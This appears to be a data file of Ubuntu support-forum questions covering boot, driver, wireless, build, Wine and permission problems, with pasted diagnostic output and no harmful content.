472100	what order are config files loaded under linux when there are multiple sources ?	i understand the main principle that local configuration files precede global /etc/ configuration files . what i really need though is some more detail on this because sometimes it 's not obvious . the example i 'd like to know an implicit answer for would be for the following postgresql config files : /etc/postgresql/9.3/main/pg_hba.conf and /usr/share/postgresql/9.3/pg_hba.conf .
472105	protected videos are not working on ubuntu 14.04 on tvnz on demand	i installed ubuntu on my wife 's computer without her permission and she is very impressed , except that she can not watch : http : //tvnz.co.nz/video - tvnz on demand ... ohhhh i know what you are thinking ... why watch that trash when there is so much good stuff out there - but apparently without bing bang theory her life is incomplete ... can you please help me make it work ? any ideas at all ? thank you ( we are in nz and have flash player installed , etc ... ) ps if you know an alternative legal way to watch ( stupid ) bing bang theory then i am all for it !
472107	cpu fan always on high speed after upgrade to 14.04	cpu fan always on high speed after update from 13.10 to 14.04 mb asus p5g41t-m lx v2 it was working nice on 13.10 output of sensors : atk0110-acpi-0 adapter : acpi interface vcore voltage : +1.17 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.39 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.17 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +12.20 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 922 rpm ( min = 600 rpm , max = 7200 rpm ) chassis fan speed : 0 rpm ( min = 600 rpm , max = 7200 rpm ) cpu temperature : +42.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +35.0°c ( high = +45.0°c , crit = +95.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +54.0°c ( high = +78.0°c , crit = +100.0°c ) core 1 : +54.0°c ( high = +78.0°c , crit = +100.0°c ) nouveau-pci-0100 adapter : pci adapter temp1 : +79.0°c ( high = +95.0°c , hyst = +3.0°c ) ( crit = +130.0°c , hyst = +2.0°c ) ( emerg = +135.0°c , hyst = +5.0°c )
472108	after installing ubuntu in a imac , i can not boot my system , why ?	after installing ubuntu desktop ( latest version ) onto my imac ( latest version ) via cd and following its instruction to remove the cd and to reboot my machine wo n't boot . it gives me a blinking underscore at the top left hand side of my screen . i 'm in the `` try ubuntu '' phase , working with this ... https : //help.ubuntu.com/community/bootpartition i 'm eager to have my workstation functional again . i looked around here and on the web all of today with not much luck ; my guess is that i have improperly set up the boot partition . i chose to remove everything during the install process in the hopes that i would be able to have a fresh machine . i 'm a novice but would love to learn and appreciate any help that anyone 's able to give .
472109	a question about samsung 840 pro ssd with kubuntu 14.04	i recently purchased samsung 840 pro ssd and installed kubuntu 14.04 ( 13.10 first , then upgraded to 14.04 ) . i did almost all the tricks ( firmware latest version , trim by discard in fstab , ext4 partition , noatime , limited swap , to increase the performance/life of sdd as suggested in the following link : https : //sites.google.com/site/easylinuxtipsproject/ssd i just did n't perform over-provisioning since i did n't know that i needed that before installing the system . 60 % of the ssd is currently in use . having said all of these , the problem i have is the following : when i do `` sudo apt-get update '' , most of the time , the computer is responsive , but sometimes ( once in a while ) , i wait to long at that line `` reading package lists ... '' . 1 % , 2 % , ... it takes forever to finish . when this problem occurs i do `` hdparm -t '' test to test the reading speed of the sdd . here is what i got : xxxxxxxxxxx : ~ $ sudo hdparm -t -- direct /dev/sda /dev/sda : timing buffered disk reads : 554 mb in 3.00 seconds = 184.56 mb/sec xxxxxxxxxxx : ~ $ sudo hdparm -t -- direct /dev/sda /dev/sda : timing o_direct disk reads : 1466 mb in 3.00 seconds = 488.29 mb/sec xxxxxxxxxxx : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1376 mb in 3.26 seconds = 421.74 mb/sec xxxxxxxxxxx : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1518 mb in 3.00 seconds = 505.97 mb/sec after this test , `` sudo apt-get update '' becomes responsive again . under normal conditions , the above test results in : xxxxxxxxxxx : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1524 mb in 3.00 seconds = 507.75 mb/sec xxxxxxxxxxx : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1520 mb in 3.00 seconds = 506.12 mb/sec xxxxxxxxxxx : ~ $ sudo hdparm -t /dev/sda /dev/sda : timing buffered disk reads : 1522 mb in 3.00 seconds = 506.72 mb/sec what do you think/suggest ? is the drive faulty or i have some issues with my current configuration ? i would be glad if anybody can help me .
472116	getting unity style back after installing gnome	i really like gnome 's shortcuts , so i installed it . it did n't only change the shortcuts , but all the icons and error sounds and everything . even the way files are displayed running ls in terminal changed . switching back to unity does n't how can i bring back unity ( with the icons and styles ) ? my question could be a duplicate of this question it did n't get any fulfilling answer , so i guess i could ask again .
472117	why i ca n't acces to an sd card with the laptop sd card reader ?	i have ab ubuntu 12.04 installation on a virtual machine and i am finding some problems try to read an sd card inserted into the sd card reader of my laptop . the problem is that if i try to insert the sd card into the laptop reader i ca n't see it into the `` computer resources '' . i have also try to insert it and then launch the dmesg command to show the content of the dmseg log to see what happens with the driver ... but i obtain this result : [ 56.473726 ] acpiphp : slot [ 63 ] registered [ 62.134056 ] init : vmware-tools pre-start process ( 1193 ) terminated with status 1 [ 223.200938 ] sda1 : write same failed . manually zeroing . [ 1008.130825 ] audit_printk_skb : 9 callbacks suppressed [ 1008.130835 ] type=1400 audit ( 1401053536.366:28 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=1099 comm= '' cupsd '' pid=1099 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 1783.188040 ] psmouse serio1 : wheel mouse at isa0060/serio1/input0 lost synchronization , throwing 1 bytes away . [ 1783.924612 ] psmouse serio1 : resync failed , issuing reconnect request andrea @ andrea-virtual-machine : /dev $ it seems to me that it ca n't see the sd reader ... why ? what can i do to solve this issue ? tnx
472119	how to uninstall an anti malware installed in windows using ubuntu os ?	hope someone can help me with this . it 's like this , my husband trying to be an it , basically he 's not and honestly i 'm not too , installed mbam anti malware to his windows pc . it 's the anti malware his company is using . because of whatever reason he has , he installed it . after installing and running a pc scan , he ca n't open his pc because it 's asking a license key . thanks god his pc is in dual boot . he installed ubuntu a month ago . all his cad files are in windows and he needs a revision of his project he is working on . can he uninstall mbam installed in windows using ubuntu ? or any other way he can use xp again ? need help on this . thank u..
472120	install ubuntu on laptop ( works to be done afterwards )	i wish to install ubuntu on my hp pavilion g6-2232tx notebook pc . what should i do ? also where do i get all the drivers from after installing ubuntu . my laptop has a graphics card and altec lancing spekaers . 4 gb ram and 500 gb hdd .
472125	deleting a application draft	i accidentally started submitting a click application when i meant to submit a desktop application is there a good way to delete it in the draft state ? i searched around the `` manage '' menu and i tried searching around online a bit but i could not find anything .
472133	upgraded old computer . unique grub rescue problem	desktop consists of : ga-78lmt-usb3 mobo amd fx-6300 6 core 3.5ghz msi n620gt-md2gd3/lp video card western digital wd1600aajs 8mb cache hd toshiba ts-h652 dvd writer 4gb crucial ddr3 ram netgear wireless card and 550w power supply . also used to run windows 7 and linux dual boot . i upgraded from an old motherboard from a desktop i bought from a friend . i honestly have no clue what make or model it was because i just threw it away without thinking . my old motherboard had ddr2 ram , pcie x16 , sata inputs and whatever else was made in that generation . the parts that are still old are the dvd writers , the hard drives , and the wireless card . the power supply was upgraded awhile ago so at least its not ancient . so when i booted up my computer for the first time in a long time ( because of money issues ) i was welcomed by the bios , and then shortly after the grub rescue screen . no matter what i try to boot from , it gives me an error no such device with a bunch of letters and numbers . i have put in live cd 's of ubuntu , boot repair disk , and kali linux . i have also tried using a usb with the files on them . but the same error persists , no such device . i have done the ls commands and i get ( hd0 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) whenever i ls the certain drives , i get the unknown filedrive error or something similar . basically saying that no linux based files exist on the hd . so with all of my options for solutions failing , i have a question ... do i just need to upgrade my hd and readers ? or is this something related to the new motherboard ? any computer help from anyone would be really appreciated ! i really want to set my computer up and play a game that requires more than 64mb of video memory that my laptop has to offer : ' (
472135	grub2 on xubuntu trusty does not display boot menu	the boot menu does not show up even though /etc/default/grub contains : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' yes , i did update-grub . holding the shift key did not help either .
472137	unable to re-size cursor on 14.04	i have a computer running ubuntu 14.04 using unity . i have 3 monitors , 2 externals and a internal . all are 1080p ( so the same resolution ) . i am unable to resize my mouse cursor to be larger . i have tried changing org.gnome.desktop.interface ( scaling factor and cursor size ) . any clue how to increase the size ?
472138	ubuntu 14.04-wireless slow to start	i recently upgraded a pc that i 've used as a fileserver and switched from ubuntu 12.04lts to 14.04lts . i use a wireless card to connect it to the router and this used to start early in boot sequence with 12.04 so the server processes such as samba worked okay . now the wireless card does n't appear to start until quite some time after i login on the 14.04 install . in all it can take well in excess of 5 minutes before i get a wireless connection . i have some knowledge of linux and over the years have generally been able to figure things out and fix problems by searching online and working through the problems . this time i 'm stuck . i 've run the script from this post about wireless issues my wireless/wifi connection does not work . what can i do ? and pasted the output here http : //pastebin.ubuntu.com/7517411/ . i 've also pasted the output from dmesg here http : //pastebin.ubuntu.com/7517427/ . my system consists of motherboard : gigabyte ga-970 ds3p cpu : amd 6-core fx6350 memory : 8 gb video : evga geforce 210 wireless : edimax 7128g rev 3.0a the wireless car is fairly old and the kernal had the required drivers in 12.04 and as the card does work eventually after boot i do n't believe that 's the problem . it seems to be that the drivers are n't loaded early on for some reason . the network settings are set so that the interface is accessible to all users and start automatically . as i understand it this should cause the interface to be started during the boot process . as i 've indicated i 'm not an expert with linux so any help in getting the wireless to start early on and speed up the boot process would be appreciated . i can supply additional information if necessary but may need some instructions in how to obtain it . thanks in advance . andy
472142	run twisted server on startup	i am pretty new to ubuntu and tried to install portia according to this howto : https : //github.com/scrapinghub/portia # running-portia everything worked fine after i run the command twistd -n slyd . i was able to view the html page in the browser . how can i keep the twited server running between system reboots ? i tried twistd slyd ( without -n ) but it just starts the twisted daemon which does n't survive a reboot . i am using ubuntu 12.04 lts server . thank you .
472143	possible to run gksudo without a password require ?	so i have xampp installed on my desktop and since it can use alot of ram if it stays active for a long time i followed tutorial to put together some kind of python script to start and stop services easy . so the script goes like this , i made shortcut on desktop and when i click it opens a window when i can start/stop services like apache , mysql , ftp . so the script starts command is this gksudo `` /opt/lampp/share/xampp-control-panel/xampp-control-panel '' but every time i click shortcut annoying notification pop up ask me for a password . is it possible to disable password ask for this ?
472145	can not locate wireless networks on acer aspire m5 laptop	i just purchased an acer aspire m5-583p laptop and installed ubuntu 14.04 on it ( this is not the machine i am typing on now ) . upon restart i am unable to connect to the internet and am not able to show any wifi connections at all . please help . the results of sudo lshw -c network thedoctor818 @ thedoctorstardis-aspire-m5-583p : ~ $ sudo lshw -c network *-network unclaimed description : network controller product : bcm4352 802.11ac wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : b0600000-b0607fff memory : b0400000-b05fffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.1 bus info : pci @ 0000:05:00.1 logical name : eth0 version : 14 serial : 08:9e:01 : f2:53:33 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-2_0.0.1 07/08/13 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:62 ioport:3000 ( size=256 ) memory : b0704000-b0704fff memory : b0700000-b0703fff and lspci -vvnn | grep 14e4 thedoctor818 @ thedoctorstardis-aspire-m5-583p : ~ $ lspci -vvnn | grep 14e4 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4352 802.11ac wireless network adapter [ 14e4:43b1 ] ( rev 03 ) are as above . how to solve this ?
472146	building atlas ( and later octave w/ atlas )	i 'm trying to set up atlas ( so i can later compile octave with atlas support ) . if i 'm correct , i still need to build this manually due to the environment specific optimizations . i do see a package for atlas , but it looks like it 's using the cross platform generic build options ( e.g . `` it 'll be slow '' ) . so , running the configure script as described in the docs seems to go poorly . as a java developer i never do well at making heads or tails of errors in these build processes . am i missing dependencies ( if so is there any documentation on what i need ) ? allusers @ vbubuntu : ~/downloads/atlas3.10.1/build_vbubuntu $ ../configure -b 64 -d c -dpentiumcps=3000 -- with-netlib-lapack-tarfile=/home/allusers/downloads/lapack-3.5.0.tgz make : `xconfig ' is up to date . ./xconfig -d s /home/allusers/downloads/atlas3.10.1/build_vbubuntu/../ -d b /home/allusers/downloads/atlas3.10.1/build_vbubuntu -b 64 -d c -dpentiumcps=3000 -si lapackref 1 os configured as linux ( 1 ) assembly configured as gas_x8664 ( 2 ) vector isa extension configured as sse3 ( 6,448 ) error : enum fam=3 , chip=2 , mach=0 make [ 3 ] : *** [ atlas_run ] error 44 make [ 2 ] : *** [ irunarchinfo_x86 ] error 2 architecture configured as corei1 ( 25 ) error : enum fam=3 , chip=2 , mach=0 make [ 3 ] : *** [ atlas_run ] error 44 make [ 2 ] : *** [ irunarchinfo_x86 ] error 2 clock rate configured as 2350mhz error : enum fam=3 , chip=2 , mach=0 make [ 3 ] : *** [ atlas_run ] error 44 make [ 2 ] : *** [ irunarchinfo_x86 ] error 2 maximum number of threads configured as 4 parallel make command configured as ' $ ( make ) -j 4' error : enum fam=3 , chip=2 , mach=0 make [ 3 ] : *** [ atlas_run ] error 44 make [ 2 ] : *** [ irunarchinfo_x86 ] error 2 can not detect cpu throttling . rm -f config1.out make atlas_run atldir=/home/allusers/downloads/atlas3.10.1/build_vbubuntu exe=xprobe_comp redir=config1.out \ args= '' -v 0 -o atlconf.txt -o 1 -a 25 -si nof77 0 -v 448 -b 64 -d b /home/allusers/downloads/atlas3.10.1/build_vbubuntu '' make [ 1 ] : entering directory `/home/allusers/downloads/atlas3.10.1/build_vbubuntu' cd /home/allusers/downloads/atlas3.10.1/build_vbubuntu ; ./xprobe_comp -v 0 -o atlconf.txt -o 1 -a 25 -si nof77 0 -v 448 -b 64 -d b /home/allusers/downloads/atlas3.10.1/build_vbubuntu > config1.out make [ 2 ] : gfortran : command not found make [ 2 ] : *** [ irunf77comp ] error 127 make [ 2 ] : g77 : command not found make [ 2 ] : *** [ irunf77comp ] error 127 make [ 2 ] : f77 : command not found make [ 2 ] : *** [ irunf77comp ] error 127 unable to find usable compiler for f77 ; abortingmake sure compilers are in your path , and specify good compilers to configure ( see install.txt or 'configure -- help ' for details ) make [ 1 ] : *** [ atlas_run ] error 8 make [ 1 ] : leaving directory `/home/allusers/downloads/atlas3.10.1/build_vbubuntu' make : *** [ irun_comp ] error 2 error 512 in syscmnd : 'make irun_comp args= '' -v 0 -o atlconf.txt -o 1 -a 25 -si nof77 0 -v 448 -b 64 '' ' mkdir src bin tune interfaces mkdir : can not create directory ‘src’ : file exists mkdir : can not create directory ‘bin’ : file exists mkdir : can not create directory ‘tune’ : file exists mkdir : can not create directory ‘interfaces’ : file exists make : *** [ make_subdirs ] error 1 make -f make.top startup make [ 1 ] : entering directory `/home/allusers/downloads/atlas3.10.1/build_vbubuntu' make.top:1 : make.inc : no such file or directory make.top:325 : warning : overriding commands for target `/atlastest' make.top:76 : warning : ignoring old commands for target `/atlastest' make [ 1 ] : *** no rule to make target `make.inc ' . stop . make [ 1 ] : leaving directory `/home/allusers/downloads/atlas3.10.1/build_vbubuntu' make : *** [ startup ] error 2 mv : can not move ‘lapack-3.5.0’ to ‘../reference/lapack-3.5.0’ : directory not empty mv : can not stat ‘lib/makefile’ : no such file or directory ../configure : 450 : ../configure : can not create lib/makefile : directory nonexistent ../configure : 451 : ../configure : can not create lib/makefile : directory nonexistent ../configure : 452 : ../configure : can not create lib/makefile : directory nonexistent ../configure : 453 : ../configure : can not create lib/makefile : directory nonexistent ../configure : 509 : ../configure : can not create lib/makefile : directory nonexistent done configure
472153	winehq/ application can not locate it 's dll	i am running ubuntu 14.04 w/ wine1.6 . also tried with wine1.7 i am trying to run simcity 2013 which i know works perfectly fine with any windows machine . when i run the exe it returns : '' error code : [ 4000 ] simcity could not find the ea webkit dll . simcity will now exit . '' the dll is named `` eawebkit.dll '' i tried using winetricks and add the dll and select every option available to no avail . the file is in the correct folder in order to run just as another machine running win 7 does . my thoughts are , there is some configuration file possibly needing altered . i think the program is looking outside the .wine/drive_c parameters . any thoughts ? tricks ? bag of bones ? ? here is the output : fixme : hnetcfg : fw_profile_get_exceptionsnotallowed 0x146e18 , 0x32fd2c fixme : hnetcfg : fw_app_get_enabled 0x146e30 , 0x32fd34 fixme : hnetcfg : fw_app_put_processimagefilename 0x146e78 , l '' c : \games\simcity 2013 offline\simcity\simcity.exe '' fixme : hnetcfg : fw_app_put_name 0x146e78 , l '' simcity '' fixme : hnetcfg : fw_apps_add 0x146e30 , 0x146e78 fixme : thread : setthreadidealprocessor ( 0xb4 ) : stub fixme : thread : setthreadidealprocessor ( 0xbc ) : stub fixme : system : setprocessdpiaware stub ! fixme : xinput : xinputgetstate ( 0 0x32f410 ) fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x32ee68,0x00000000 ) , stub ! fixme : thread : setthreadidealprocessor ( 0x1d8 ) : stub err : ole : coinitializeex attempt to change threading model of this apartment from apartment threaded to multi-threaded fixme : winediag : auddrv_getaudioendpoint winepulse is not officially supported by the wine project fixme : winediag : auddrv_getaudioendpoint for sound related feedback and support , please visit http : //ubuntuforums.org/showthread.php ? t=1960599 fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : resource_check_usage unhandled usage flags 0x8 . fixme : d3d : debug_d3dformat unrecognized 0x36314644 ( as fourcc : df16 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x36314644 ) in the format lookup table fixme : d3d : debug_d3dformat unrecognized 0x34324644 ( as fourcc : df24 ) wined3dformat ! fixme : d3d : wined3d_get_format ca n't find format unrecognized ( 0x34324644 ) in the format lookup table
472155	extra user at users account	i have installed this operating system my self and created one account as an owner and root . i do not know where `` me `` account came from . however , i get many access permissions error , even-while , working as the root account . as you may see at the prtscr picture `` owner me '' account does not have an option to select someone else and only one account exists at system sittings . gtk nautilus and sudo stopped working , su does not accept my known administrator password . ubuntu 14.04 3.13.0-24 generic # 47 . any help around these malfunctions ?
472159	determining system architecture	does anyone know of a program or script i can use to find out what architecture my sony vaio pcv-rs520 desktop computer is ? i 've been mulling over an upgrade to 14.04 64-bit , however i am not sure if the computer can handle it . here is the output of /proc/cpuinfo . pastebin link i know each core says it has 32 bits of virtual address sizes , but i am not sure if these combine or if i am limited to 32-bit operating systems . ( p.s . no , if the current setup is n't 64-bit capable , i 'm not replacing anything , hardware or otherwise . )
472162	permission error trying this backup script	i am trying this backup shell script from the server guide . granted it 's for my desktop running xubuntu 14.04 . the nfs is mounted and accessible . the script has been created and edited with the correct directories i want to back up , and has the following permissions ; -rwxr-x -- - 1 root root 661 may 25 20:51 prod1backup.sh the error given is ; tar ( child ) : /home/servershare/networkbackup/zach-ubuntu-tt-1-sunday.tgz : can not open : permission denied tar ( child ) : error is not recoverable : exiting now i believe tar does not have permission to create the file , as running a tar by itself outside of the script requires sudo . any suggestions ? i do n't know much about scripting , but am trying to pick up bits and pieces .
472169	usb installation : f12 still starts windows 7	i used pen drive linux and installed ubuntu on a 4gb thumb drive . it said i did it successfully , but ... . i turn on the laptop , press f12 , and select option 5 for usb . after i select usb , windows 7 starts up . on my second try , i pressed f2 and set the boot preferences to usb before hard drive . still , windows 7 booted up . can anyone explain what 's happening , and suggest a solution ?
472175	why it is sudo ?	why we use sudo to perform a terminal command as an administrative , why it is n't admin or something else , is there a reason for sudo ?
472179	how to change/customize copy.com nautilus overlay icons ?	the grey copy.com overlay icons , which indicate a file 's synchronization or upload status in nautilus , appear less integrated with the ubuntu look and feel , compared to the icons that were used by the ubuntuone client . how can the copy.com overlay icons be customized ?
472181	where is the app data folder in 14.04 ?	i 'm told to make a folder and put a file into it and the instructions read like this : ~/.foldername so foldername the folder i 'm creating and the directory that they tell me to place it in is ~/ . please help . i searched through all the folders with the view hidden items on and still ca n't figure it out . first time using this operating system . thanks !
472184	encrypted hdd - enter passkey with on-screen keyboard and touch screen	i am building a personal media/documentation server with a ( cheap ) touch screen . i would like to have drive encryption , but without requiring a physical keyboard . being only moderately experienced with linux/ubuntu i feel that this should be possible as long as i load the drivers and software keyboard into the initrd/ramdrive . unfortunately that is a bit beyond the scope of my knowledge . i am willing to invest the time to get this working as a hobby project , but would like to ensure that my time would not be wasted . so my question for any gurus out there is : is it possible to load an on-screen keyboard with touchscreen support to enter the passkey for an encrypted drive ? edit : if it matters it is currently built as ubuntu desktop using the alternate 12.04.4 installer .
472187	how can i solve this installation problem ?	i had ubuntu , not sure which version and , and it had been in storage and it had n't been on the internet for some time . when i put it together and reconnected it , it started up briefly before the power cord was knocked out and the system seemed to crash . i downloaded ubuntu 14.04 to a cd . on the install , when i finally managed to get past a grub loading issue -error message 18 ... i tried to boot from hard drive , and it went to a ubuntu opening screen that asks for username and password . the user name and password that i was sure was correct does n't work . i 'm wondering just how to install either the old version that seems to still be there , or possibly install 14.04 from the cd .
472188	how to install sublime text on ubuntu chromebook ?	i have installed ubuntu 12.04 on my samsung chromebook using crouton . i wanted to know how can i install sublime text on it ( any version would do ) ? and if it is not possible to install it then please recommend some nice alternative to it . this is the error log when installing : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : sublime-text 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 9,670 b of archives . after this operation , 51.2 kb of additional disk space will be used . get:1 http : //ppa.launchpad.net/webupd8team/sublime-text-2/ubuntu/ precise/main sublime-text all 2.0.2-1~webupd8~3 [ 9,670 b ] fetched 9,670 b in 3s ( 2,521 b/s ) preconfiguring packages ... please report to author unsupported platform 'armv7l ' . selecting previously unselected package sublime-text . ( reading database ... 68361 files and directories currently installed . ) unpacking sublime-text ( from ... /sublime-text_2.0.2-1~webupd8~3_all.deb ) ... please report to author unsupported platform 'armv7l ' . please report to author unsupported platform 'armv7l ' . downloading ... -- 2014-05-26 10:21:44 -- https : //c758482.ssl.cf2.rackcdn.com/sublime % 20text % 202.0.2.tar.bz2 resolving c758482.ssl.cf2.rackcdn.com ( c758482.ssl.cf2.rackcdn.com ) ... 72.246.79.162 connecting to c758482.ssl.cf2.rackcdn.com ( c758482.ssl.cf2.rackcdn.com ) |72.246.79.162|:443 ... connected . http request sent , awaiting response ... 200 ok length : 5584673 ( 5.3m ) [ application/x-bzip2 ] saving to : `sublime text 2.0.2.tar.bz2' 0k ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. ... ... .. 56 % 23.3k 1m42s 3072k ... ... .. ... ... .. ... ... .. ... ... .. ... .. 100 % 56.3k=2m54s 2014-05-26 10:24:45 ( 31.3 kb/s ) - `sublime text 2.0.2.tar.bz2 ' saved [ 5584673/5584673 ] download done . removing outdated cached downloads ... sha256sum mismatch sublime text 2.0.2.tar.bz2 sublime text is not installed . dpkg : error processing /var/cache/apt/archives/sublime-text_2.0.2-1~webupd8~3_all.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/sublime-text_2.0.2-1~webupd8~3_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
472189	enable copying of special files in gui	i have made a portable hdd to boot into root user directly hen booted . i have also removed the login screen , so that it directly boots into the root user . i no have to make a change in copy method in gui . i do the copy then paste using ctrl+c & ctrl+v . but no the special files do not get copied . i want to edit the 'copy ' file ( file that executes gui copy ) and make changes so that it can copy the contents of special files and make a new file at destination . note : when boot from portable hdd into root user , i want to copy the os from internal hdd , ubuntu 12.04 . thanks .
472191	ca n't resize font with `` ctrl [ shift ] + '' and `` ctrl [ shift ] - `` in wmii	in my company , i have a ubuntu 14.04 installed in a virtualbox , i installed wmii on it , everything works fine . but at home , i 'm using legitimate ubuntu 13.10 , and installed a wmii on it . the font is n't right , especially with utf-8 code . the worse part is , i even ca n't resize it with `` ctrl [ shift ] + '' and `` ctrl [ shift ] - `` shortcut keys , which i was quite familiar with . i 've find the wmiirc in my machine , which says wmiifont= ' { wi_readctl font } i do n't know how to change it so i can have a better resizeable font with utf-8 support ? thanks for your help .
472194	how do i replace ( not dual-boot ) windows xp with lubuntu ?	i 'm not a technie ; i do n't know anything about coding . i 'm a somewhat basic computer user . however , now that microsoft has phased out support for windows xp , i have to change oss . however , i do n't have the money for buying a new computer , so i read some articles , and i learned about lubuntu : a supposedly lightweight xp-esque os . but here 's the thing : i do n't know how to install lubuntu . i also do n't want to dual-boot , so i have to replace xp with the new os . and although i have a 4 gib flashdrive , i do n't have a burnable or writable cd . so , how do i do this ... ? i 'm not experienced in this field ... i wish there was an installer wizard or whatever that could do all that for me : eliminate xp from my computer , then install lubuntu onto it . please help me ? any help at all would be greatly appreciated ... thank you . computer specs : microsoft windows xp professional ver . 2002 , sp3 ( 32-bit ) btw , i checked my hard drive space and ram space : i do have the min . requirements covered .
472202	get intersection between two files using command line	what is the most efficient way to get the intersection between two files , there is : sort file1 file2 | uniq -d
472204	set the default program to pdf studio 8 pro	i just installed kubuntu 14.04 kde on my laptop , and installed a pdf studio 8 pro which i purchased from qoppa.com . i have the same program installed on my other computer , which runs on linux mint 16 kde operating system . on my linux mint computer , i can set the default to open a pdf file with pdf studio automatically . that is accomplished by right clicking on a pdf file , and choose pdf studio , which is located under `` office '' , and set the default so you can open a pdf file by simply double clicking the file . on kubuntu 14.04 kde , the pdf studio is not located in the office , or any where else that i could find . it is located in `` home '' directory , and in order to open a pdf file with pdfstudio 8 , i have to open the home directory , open the pdfstudio 8 folder , choose the pdfstudio 8 desktop , open it first , and then choose the file that i want to open . even though that i have made a short-cut to the pdfstudio in my panel , but it still takes a few seconds . verses double clicking the file , which is instantaneous . any suggestion will greatly appreciated .
472205	new install on hard drive error	i downloaded ubuntu 14.04lts and burned a dvd . i then booted on that dvd and ran the install on a newly formatted hard drive with fat32 . the hard drive used to have windows xp and is a maxtor 80 gb ata/133 hdd . install finished and rebooted on the hard drive and a black screen came up with : [ 17.016035 ] [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtcilo ] [ 17.016038 ] fbcon_init : detected unhandled fb_set_par error , error code -22 [ 17.016119 ] [ drm : drm_crtc_helper_set_config ] *error* failed to set mode on [ crtcilo ] then i get the ubuntu desktop but the mouse nor the keyboard works . nothing happens -- till i hold in the reset button or pull the plug . i tried reinstalling and an error came up for some add-on would have to be installed manually later . what is going on here ?
472208	can anyone decipher this kernel segfault report ?	i use bluefish a lot for coding etc but at the moment it is just closing . i have extracted the following from the logs . does it mean anything to anyone ? may 26 15:26:39 villa kernel : [ 247.521915 ] bluefish [ 2262 ] : segfault at 198 ip 00007f9c2b4376e1 sp 00007fff7c233630 error 4 in libgtk-3.so.0.1000.8 [ 7f9c2b2e1000+4ff000 ]
472212	can i install ubuntu as a second operating system on a windows 7 laptop ?	my dad wants ubuntu installed as a second operating system on his windows-7 laptop . is this reasonably easy to do and easy to choose with op system to boot up with each time he uses it ?
472213	where does pidgin display jabber away messages ?	pidgin only displays `` away '' or `` extended away '' but not additional message . where does pidgin display custom away messages ?
